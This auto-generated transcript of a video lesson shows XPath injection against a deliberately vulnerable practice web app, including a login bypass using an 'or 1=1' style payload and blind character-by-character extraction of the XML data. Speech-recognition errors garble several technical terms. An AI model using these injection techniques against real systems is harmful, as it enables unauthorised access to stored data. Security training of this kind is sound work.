1 00:00:00,520 --> 00:00:08,140 So it's quite common for developers to use XML documents in Web applications and XML documents are generally 2 00:00:08,140 --> 00:00:14,080 used to store configuration data or to transfer data from a source to a destination. 3 00:00:15,770 --> 00:00:21,110 So most of the programming languages are able to edit or create XML documents. 4 00:00:22,210 --> 00:00:25,930 But there is a standard query language, for example, documents. 5 00:00:26,780 --> 00:00:29,210 Its name is XPath. 6 00:00:30,520 --> 00:00:33,880 So XPath stands, for example, path language. 7 00:00:34,770 --> 00:00:47,820 XPath uses path like syntax to query XML documents and like Escorial, it will provide specificity for 8 00:00:47,820 --> 00:00:55,860 certain attributes to find them and then the patterns to match, so it helps to identify and navigate 9 00:00:55,860 --> 00:00:57,660 nodes in an XML document. 10 00:00:59,040 --> 00:01:07,770 Now, XPath differs from other database languages as there is no access controls or user authentication. 11 00:01:08,810 --> 00:01:16,370 For instance, an attacker can inject XPath statements in some input fields, and if there's no control 12 00:01:16,370 --> 00:01:21,140 at the back end, then it is also possible to access the entire XML document. 13 00:01:22,280 --> 00:01:25,940 So in this lesson, we're going to cover XPath attack. 14 00:01:27,320 --> 00:01:29,780 So open Caleigh and log in to be Web. 15 00:01:31,080 --> 00:01:32,340 We are going to do both. 16 00:01:33,680 --> 00:01:38,120 So choose the first one from the menu above, it is a login form. 17 00:01:39,390 --> 00:01:41,100 Just write something and log in. 18 00:01:42,670 --> 00:01:43,840 OK, so we get an error. 19 00:01:44,990 --> 00:01:48,710 And now just enter a single quote and then log in. 20 00:01:49,910 --> 00:01:53,020 OK, so this is not what we expect then, right? 21 00:01:53,410 --> 00:01:59,040 Normally, we're going to see Escorial errors, but an XML error appears on the top of the page. 22 00:01:59,760 --> 00:02:05,150 Now, obviously, it's a different and the data transmits over the Eurail. 23 00:02:05,820 --> 00:02:07,410 So let's have a look at the code. 24 00:02:08,430 --> 00:02:12,120 Open XML, I underscore one dot page be. 25 00:02:14,050 --> 00:02:19,420 Now the developer puts their security checks based on the security level. 26 00:02:20,410 --> 00:02:25,780 OK, so we're going to look into this function later, but now scroll down. 27 00:02:26,700 --> 00:02:33,510 And this is a part of that we're looking for see here on line 75, the developer loads an XML file. 28 00:02:34,430 --> 00:02:40,730 Then they check the log in and password in and XPath query online 78. 29 00:02:42,010 --> 00:02:49,840 And then based on the results of this query, it shows the message or in valid credentials, error. 30 00:02:50,910 --> 00:02:52,290 OK, so exit this. 31 00:02:53,630 --> 00:02:56,840 And we can view the external functions file. 32 00:02:58,090 --> 00:03:06,430 So scroll to find an example, injection function up, found it, and it replaces characters that can 33 00:03:06,430 --> 00:03:10,510 be used in an XPath query with a whitespace character. 34 00:03:11,810 --> 00:03:12,860 OK, so exit. 35 00:03:14,650 --> 00:03:16,960 Then let's open sublime text. 36 00:03:17,940 --> 00:03:22,530 Now, before we go any further, I do want to show you the XPath query execution. 37 00:03:24,590 --> 00:03:26,180 OK, so open the tools menu. 38 00:03:27,340 --> 00:03:29,500 Install, package control. 39 00:03:31,580 --> 00:03:33,860 OK, so it's installed and now click OK. 40 00:03:35,400 --> 00:03:36,780 And go to preferences. 41 00:03:38,040 --> 00:03:39,600 Click on package control. 42 00:03:40,640 --> 00:03:42,710 Then click install package. 43 00:03:44,340 --> 00:03:48,000 And now you're going to see sublime packages or extensions. 44 00:03:49,030 --> 00:03:57,160 So to execute XPath queries, we're going to need an extension, so type XPath and just click on the 45 00:03:57,160 --> 00:03:57,640 first one. 46 00:03:58,730 --> 00:04:00,760 And now it will be installed in the background. 47 00:04:01,980 --> 00:04:04,770 OK, so now, though, the heroes that XML file. 48 00:04:09,840 --> 00:04:12,180 OK, then hit control shift P. 49 00:04:13,120 --> 00:04:15,850 Type query and so like the first one. 50 00:04:17,760 --> 00:04:19,570 So now let me zoom it in for you. 51 00:04:20,160 --> 00:04:25,530 So this extension helps us to execute XPath queries on a document. 52 00:04:26,640 --> 00:04:31,080 So, OK, I'm going to paste the query in the code to here. 53 00:04:32,110 --> 00:04:36,560 And the code was like that, and it contains code as well. 54 00:04:37,270 --> 00:04:38,730 So we just clean them up. 55 00:04:43,310 --> 00:04:46,130 So this is the actual XPath query. 56 00:04:47,720 --> 00:04:53,350 Logic is almost the same as escarole queries. 57 00:04:55,610 --> 00:05:02,870 So the query just means that under the Heroes route element, choose a hero, which has a specific login 58 00:05:02,870 --> 00:05:03,530 and password. 59 00:05:05,230 --> 00:05:07,300 All right, so now type Neo. 60 00:05:08,440 --> 00:05:10,150 And then Trinity. 61 00:05:11,980 --> 00:05:15,220 And now look above the first hero element is chosen. 62 00:05:17,000 --> 00:05:21,740 So the login mechanism in this form works like that on this XML file. 63 00:05:22,980 --> 00:05:24,600 So now we can delete these values. 64 00:05:26,510 --> 00:05:28,070 And put in a single quote. 65 00:05:29,190 --> 00:05:30,240 It breaks a query. 66 00:05:31,120 --> 00:05:32,260 And nothing appears. 67 00:05:33,860 --> 00:05:38,450 And I'll type or one equals one or a single quote. 68 00:05:40,230 --> 00:05:42,630 Then all the hero elements are chosen. 69 00:05:43,930 --> 00:05:45,520 So I'm going to copy this payload. 70 00:05:48,060 --> 00:05:50,160 And go back to Firefox. 71 00:05:51,830 --> 00:05:54,290 Pasted into this field and log in. 72 00:05:55,280 --> 00:05:57,830 And there it goes, it works so. 73 00:06:00,720 --> 00:06:06,540 Actually, we can only see what is in the first line or, well, the first element of the result. 74 00:06:07,830 --> 00:06:13,260 OK, so now you can see the code and you can prepare your XPath payloads. 75 00:06:14,810 --> 00:06:19,040 Well, let me tell you, in a real world test, it's not really like that. 76 00:06:20,400 --> 00:06:27,600 After you see the XML error, you need to try more for exploiting open your perspective a little bit. 77 00:06:28,470 --> 00:06:34,580 So this was our payload change one or two and go and we get an error. 78 00:06:35,430 --> 00:06:39,180 So this means that our payload executes well. 79 00:06:40,120 --> 00:06:42,100 So now it's time to pull the data. 80 00:06:43,490 --> 00:06:47,060 And we can view the first hero on the list. 81 00:06:48,150 --> 00:06:51,120 And then by adding this code, we can view in other. 82 00:06:54,140 --> 00:06:55,700 And it's the same user. 83 00:06:56,760 --> 00:06:58,500 This time to. 84 00:07:00,570 --> 00:07:05,040 Second users, Alice was the third one for. 85 00:07:06,020 --> 00:07:07,880 It was the fourth one, Wolverine. 86 00:07:09,160 --> 00:07:12,490 It was the fifth one, Johnny six. 87 00:07:14,560 --> 00:07:16,960 Seline Seventy-one. 88 00:07:17,930 --> 00:07:21,240 OK, and because there is no other user, we get this error. 89 00:07:22,070 --> 00:07:25,820 So anyway, I'm going to give you some payload so that you can go further. 90 00:07:27,300 --> 00:07:30,660 So to get a number of the root elements right, this one. 91 00:07:32,210 --> 00:07:33,470 And we'll get the result. 92 00:07:34,730 --> 00:07:37,910 So it means that there is one root element. 93 00:07:39,080 --> 00:07:43,160 And because there is only one rule element, the rest will work like that. 94 00:07:45,550 --> 00:07:48,640 So to get the number of elements in the file, right, this one. 95 00:07:50,150 --> 00:07:51,560 No, it's not one. 96 00:07:55,270 --> 00:07:57,250 Yes, it is 43. 97 00:07:59,610 --> 00:08:05,040 Then to the number of child elements under the heroes element, right, this one. 98 00:08:06,730 --> 00:08:09,850 Sure enough, there are six children under heroes. 99 00:08:11,230 --> 00:08:16,680 And again, the length of the name of the current node and root node type, this payload. 100 00:08:18,390 --> 00:08:21,700 And the length is not one, is it, six? 101 00:08:22,570 --> 00:08:25,230 Yeah, because it is heroes. 102 00:08:26,710 --> 00:08:33,100 So now to get the name of the root element, one by one type, this payload. 103 00:08:34,980 --> 00:08:36,990 First character is not a. 104 00:08:38,570 --> 00:08:39,230 H. 105 00:08:40,680 --> 00:08:47,100 Yeah, the first character is Age, now you can follow along the same way to get the other characters. 106 00:08:48,490 --> 00:08:54,820 OK, so to get the length of the name of the first child under the root element, type this payload. 107 00:08:56,600 --> 00:08:57,980 And no, it is not one. 108 00:08:59,130 --> 00:09:00,300 So is it for. 109 00:09:01,510 --> 00:09:02,500 It sure is. 110 00:09:04,180 --> 00:09:11,050 OK, so now to get the name of the first child under the root element, one by one type this payload. 111 00:09:12,300 --> 00:09:15,540 It is not A, is it, H? 112 00:09:17,070 --> 00:09:18,300 And yes, it is. 113 00:09:19,340 --> 00:09:26,180 All right, so if we follow along this way, we can extract the name of the first child under the root 114 00:09:26,180 --> 00:09:26,660 element. 115 00:09:28,340 --> 00:09:35,330 OK, so now to get the number of children of the first child under the root element to this payload. 116 00:09:37,070 --> 00:09:38,930 Is it more than one child? 117 00:09:40,260 --> 00:09:41,310 So is it six? 118 00:09:43,970 --> 00:09:46,960 OK, so the first child has six children. 119 00:09:48,250 --> 00:09:55,360 So now let's get the length of the name of the first of this six type in this payload. 120 00:09:56,720 --> 00:09:58,940 No, it's not one, is it, to? 121 00:10:00,210 --> 00:10:01,170 Why, yes, it is. 122 00:10:02,540 --> 00:10:07,970 OK, so get the name of them one by one type in this payload. 123 00:10:09,340 --> 00:10:12,610 The first character is not a so that's changed. 124 00:10:12,640 --> 00:10:13,060 Why? 125 00:10:14,160 --> 00:10:15,690 And yeah, I. 126 00:10:17,810 --> 00:10:20,030 So I assume we discovered one by one. 127 00:10:21,360 --> 00:10:26,070 Then type this to get the length of the text of this child. 128 00:10:27,150 --> 00:10:29,580 A length of text is one. 129 00:10:31,280 --> 00:10:33,170 OK, so was this text one. 130 00:10:34,620 --> 00:10:36,870 And yeah, the text is one. 131 00:10:37,450 --> 00:10:38,130 OK, so. 132 00:10:39,990 --> 00:10:41,170 I think you get the point right. 133 00:10:42,030 --> 00:10:46,170 So step by step, we discover the root element, the elements, as well as the children. 134 00:10:47,600 --> 00:10:48,020 So. 135 00:10:49,160 --> 00:10:53,930 If it is necessary, you can discover the attributes and the others as well. 136 00:10:55,490 --> 00:11:00,620 But then finally, I want to show you that we will be able to pull data from the XML file. 137 00:11:01,860 --> 00:11:03,990 So why don't we go ahead and do another example? 138 00:11:04,990 --> 00:11:08,200 So from the menu above, choose the second one. 139 00:11:10,940 --> 00:11:13,400 It selects movies based on their genre. 140 00:11:15,220 --> 00:11:18,220 So you may not see this royal message on the page. 141 00:11:19,630 --> 00:11:27,220 I enabled it from the code so that I could show you how XPath finds the values, so don't freak out, 142 00:11:28,510 --> 00:11:34,900 but just open the terminal view xml I underscore to dot BHP. 143 00:11:36,960 --> 00:11:47,040 Scroll down to below, and here is the XPath query, so it chooses the child element movie from the 144 00:11:47,040 --> 00:11:51,180 hero elements, which has a specific genre element. 145 00:11:51,810 --> 00:11:54,270 OK, yeah, I know my sentence. 146 00:11:54,300 --> 00:11:56,220 It's a little bit long and weird, but. 147 00:11:57,180 --> 00:12:01,620 It's really what it is and what it is, is what it is. 148 00:12:03,130 --> 00:12:08,740 Anyway, the remaining part prints the output to the screen and a table. 149 00:12:10,440 --> 00:12:12,210 So why don't we go back to Sublime? 150 00:12:13,230 --> 00:12:14,610 And Pasic query here. 151 00:12:16,350 --> 00:12:18,780 Now I'm going to clear the syntax. 152 00:12:20,890 --> 00:12:22,990 And this is the actual XPath query. 153 00:12:23,940 --> 00:12:27,210 And the movies immediately appear. 154 00:12:28,900 --> 00:12:34,330 Now, if I were to clear here from the Eurail, I can see all the movies. 155 00:12:36,000 --> 00:12:37,620 OK, so go to sublime again. 156 00:12:38,880 --> 00:12:40,500 Now, add a single quote here. 157 00:12:41,720 --> 00:12:42,470 And. 158 00:12:43,510 --> 00:12:44,440 Nothing appears. 159 00:12:45,600 --> 00:12:47,310 Because it breaks the syntax. 160 00:12:48,400 --> 00:12:50,050 So now I'm going to add this. 161 00:12:52,000 --> 00:13:01,660 OK, so I think there is no syntax error now, and we'll add something here, OK, perfect result appears 162 00:13:02,000 --> 00:13:03,030 that's what we're looking for. 163 00:13:04,090 --> 00:13:08,710 So now I'm going to copy this payload and paste it into the You are El. 164 00:13:13,900 --> 00:13:14,650 And it works. 165 00:13:15,840 --> 00:13:20,430 OK, so let's go back to Sublime and I'm going to add a few things. 166 00:13:24,160 --> 00:13:28,300 And this time it will bring all the data into the XML file. 167 00:13:29,490 --> 00:13:33,930 So I'll copy this payload and paste it in the you are well and then go. 168 00:13:38,630 --> 00:13:39,620 And what do you see? 169 00:13:39,650 --> 00:13:42,530 We can view all that text data in the table. 170 00:13:44,770 --> 00:13:49,990 All right, so that wraps it up, for example, in Jackson or XPath injection. 171 00:13:51,710 --> 00:13:55,520 So you can do whatever you want to at this stage. 172 00:13:57,280 --> 00:14:05,470 You can go further, try several other payloads, you can see what works, what doesn't work, that, 173 00:14:05,470 --> 00:14:06,790 my friends, is up to you.